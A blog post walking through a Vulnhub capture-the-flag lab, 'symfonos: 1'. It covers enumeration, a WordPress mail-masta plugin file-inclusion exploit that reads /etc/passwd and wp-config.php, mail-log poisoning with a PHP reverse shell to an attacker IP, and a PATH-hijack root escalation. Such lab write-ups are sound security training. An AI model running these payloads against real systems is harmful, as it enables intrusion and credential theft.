Monday, 15 March 2021

Vulnhub Writeup: Symphonos

Vulnhub - Symphonos.md

Vulnhub - Symfonos: 1

Yet another vulnhub box writeup!

login screen

You can download the VM from Vulnhub

Description

Beginner real life based machine designed to teach a interesting way of obtaining a low priv shell. SHOULD work for both VMware and Virtualbox.

Name: symfonos: 1
Difficulty: Beginner
Tested: VMware Workstation 15 Pro & VirtualBox 6.0
DHCP Enabled
Note: You may need to update your host file for symfonos.local

Initial Scans

Scan the subnet

nmap -sn 192.168.110.0/24

host is up at 192.168.110.155, run some basic scans

autorecon 192.168.110.155

Open Ports

PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
25/tcp  open  smtp        syn-ack ttl 64 Postfix smtpd
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

22/tcp - OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)

Normal looking banner

nc 192.168.110.155 22
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6

Check out later

ssh user enumeration doesn’t work on this machine, all results show as valid users.

ssh user enum

more ssh enum

25/tcp - Postfix smtpd

Connecting to the port with netcat takes about 10 seconds. This means that enumeration on this service could take a long time if it’s opening a new connection for each attempt.

The verify method is is available so this can be used for user enumeration.

$ nc 192.168.110.155 25
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
HELO test.com
250 symfonos.localdomain
VRFY root
252 2.0.0 root
VRFY abnab
550 5.1.1 <abnab>: Recipient address rejected: User unknown in local recipient table

Added root to users.txt

Here is an attempted SMTP user enumeration with a 60 sec timeout since it’s slow to connect

smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 192.168.110.155 -w 60

Added found (default) users to users.txt

smtp-user-enum scan

hydra seems much quicker at enumerating

hydra smtp-enum://192.168.110.155/vrfy -L /usr/share/seclists/Usernames/Names/malenames-usa-top1000-lower.txt

hydra smtp enumeration

80/tcp - Apache httpd 2.4.25 ((Debian))

Here I did a basic gobuster scan which found very little. Will come back to this service later when there is potentially more information.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.110.155/ -x php,txt,html,htm,bak -o ./root--dirlist-big.log

139/tcp - Samba smbd 3.X - 4.X (workgroup: WORKGROUP) + 445/tcp - Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)

Some basic smb checks with no credentials / null session

smbclient -L //192.168.110.155
smbmap -H 192.168.110.155 -u '' -p ''

basic smb checks

It looks like the anonymous share can be mapped by a guest user.

Mounting the anonymous share

cd /tmp
mkdir anonymous
sudo mount -t cifs //192.168.110.155/anonymous /tmp/anonymous
cd anonymous/
ls
cat attention.txt

mounting anon share

Contents of attention.txt

Can users please stop using passwords like ‘epidioko’, ‘qwerty’ and ‘baseball’!

Next person I find using one of these passwords will be fired!

-Zeus

Added to passwords.txt

Here, I tried an smb password brute force test with crackmapexec, unfortunately this doesn’t yield valid results. I think this is because guest users are allowed and all tests that crackmapexec tries succeed.

crackmapexec smb 192.168.110.155 -u users.txt -p passwords.txt --continue-on-success

crackmap exec false pos

Using rpcclient enumeration, I found a username - ‘helios’ which I added to users.txt

$ rpcclient -U '' 192.168.110.155
rpcclient $> enumdomusers

rpcclient

Manually “brute forcing” the helios user with the password list works

manual brute force

Mounting the helios share

mkdir /tmp/helios
sudo mount -t cifs -o username=helios,password=qwerty //192.168.110.155/helios /tmp/helios
ls helios/
cd helios/
cat todo.txt
cat research.txt

mount helios

Contents of todo.txt

  1. Binge watch Dexter
  2. Dance
  3. Work on /h3l105

Contents of research.txt

Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.

/h3l105 wordpress site

Browsing the site at /h3l105 strongly suggests that symfonos.local is the host name for this site, so add I added to /etc/hosts

burp hostname hint

Refreshing the site with the hostname shows the proper content.

helios wordpress site

After running ```wpscan`` there aren’t many leads. Lots of XSS vulnerabilities, but no LFI, RCE, SQL injection etc.

wpscan --url https://symfonos.local/h3l105/ --api-token=<TOKEN HERE> | tee wpscan.log

wpscan

http://symfonos.local/h3l105/wp-content/uploads/ is browseable.

The only post is from username ‘admin’

I tried exporting research.txt to a wordlist by splitting on space, added words without punctuation and specials and ran a brute force using wpscan

wpscan --passwords ./wordlist.txt --usernames admin --url http://symfonos.local/h3l105/ | tee ./web/wpscan-brute-admin.log 

unfortunately doesn’t get a match. At this point I also tried using hashcat to create a custom wordlist using leetspeak since the URL for the WordPress site is in l33tsp34k.

hashcat -a 0 ./wordlist.txt -r /usr/share/hashcat/rules/leetspeak.rule --stdout > /tmp/leetspeak-wordlist.txt

Unfortunately this also didn’t work.

Local File Inclusion (LFI)

At this point I was a bit stuck so I went to google. I got a HINT to include aggressive detection in wpscan.

wpscan --url https://symfonos.local/h3l105/ --api-token=<TOKEN HERE> --plugins-detection AGGRESSIVE | tee wpscan-aggressive.log

wpscan aggressive

This is much more promising. The exploit-db post shows an unauthenticated LFI in count_of_send.php

This works perfectly and allows retrieval of any file the web server user account can access.

curl http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

working lfi

It also allows downloading php source code with the php://filter wrapper

curl --silent http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=/var/www/html/h3l105/wp-config.php | base64 --decode

lfi for wp-config.php

Remote Code Execution

Usually moving from LFI to RCE involves reading a log file. I used my standard list of log files and tried to read any. All of these regular logs such as the Apache webserver log were not readable.

Since the machine is running Postfix, I tried the normal postfix log file locations with no luck. At this point I tried looking around for mail files in case these were readable and luckily /var/mail/helios was valid and readable with the LFI.

mail readable

Great, so now if we can get PHP code into this mail file then we should have remote code execution.

Sending a mail is possible using netcat to the mail server port.

HELO test.com
MAIL FROM: <test@test.com>
RCPT TO: <helios@symfonos.localdomain>
Data
Subject: This is test
<?php phpinfo(); ?>

.

send phpinfo

And now hitting the URL shows phpinfo proving code execution

phpinfo

So now sending a reverse shell should work.

HELO test.com
MAIL FROM: <test@test.com>
RCPT TO: <helios@symfonos.localdomain>
Data
Subject: This is more test
<?php $sock=fsockopen("192.168.110.128",2001);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>

.

reverse shell

Hitting the URL provides a shell

shell

Privesc from helios user

Searching for SUID binaries gives us a non-standard binary in /opt/statuscheck

find / -perm -4000 -type f 2>/dev/null | xargs ls -la

found statuscheck binary

statuscheck binary is SUID

It looks like statuscheck just runs a curl command

running statuscheck

Exploiting a SUID binary which runs another command can be done by replacing the path to an attacker controller location before the binary runs. This can be done if the SUID binary or script is running a command without the full path. For example

curl http://localhost

statuscheck is a Linux executable ELF file so we can’t just read in plaintext what it’s doing.

statuscheck elf

Rather than decompiling the binary, I’ll just have a go

cd /home/helios
echo "/bin/sh" > curl
chmod +x curl
PATH=/home/helios:$PATH /opt/statuscheck

rooted

And that’s the box. I learned to always check available options in scanning tools. I had missed the aggressive scan for plugins in wpscan and therefore would not have been able to do this box.

Written with StackEdit.

No comments:

Post a Comment

Please be nice! :)

Vulnhub Writeup: Glasgow Smile

Vulnhub - Glasgow Smile Vulnhub Writeup - Glasgow Smile 1.1 Description Title: Glasgow Smile Users: 5 Difficulty ...